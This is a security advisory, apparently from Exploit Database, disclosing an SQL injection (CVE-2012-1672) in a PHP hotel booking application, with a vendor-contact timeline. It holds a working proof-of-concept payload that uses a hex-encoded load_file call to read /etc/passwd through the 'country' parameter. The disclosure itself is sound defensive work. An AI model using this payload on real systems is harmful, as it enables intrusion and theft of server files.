Hotel Booking Portal – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Mark Stanislav
  日期： 2012-04-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18702/

• 'Hotel Booking Portal' SQL Injection (CVE-2012-1672)
  Mark Stanislav - mark.stanislav@gmail.com
  
  
  I. DESCRIPTION
  ---------------------------------------
  A vulnerability exists in getcity.php that allows for SQL injection of the 'country' POST parameter.
  
   
  II. TESTED VERSION
  ---------------------------------------
  0.1
  
  
  III. PoC EXPLOIT
  ---------------------------------------
  POST a form to getcity.php with the value of 'country' set to: ' union select null,null,load_file(0x2f6574632f706173737764),null,null,null,null,null from users where 'a'='a
  
  
  IV. SOLUTION
  ---------------------------------------
  Do not use this software, no patched version exists at this time.
  
  
  V. REFERENCES
  ---------------------------------------
  http://sourceforge.net/projects/hbportal/
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1672
  
  
  VI. TIMELINE
  ---------------------------------------
  03/02/2012 - Initial vendor disclosure
  03/20/2012 - Received no response and sent a second e-mail to the vendor
  04/04/2012 - Public disclosure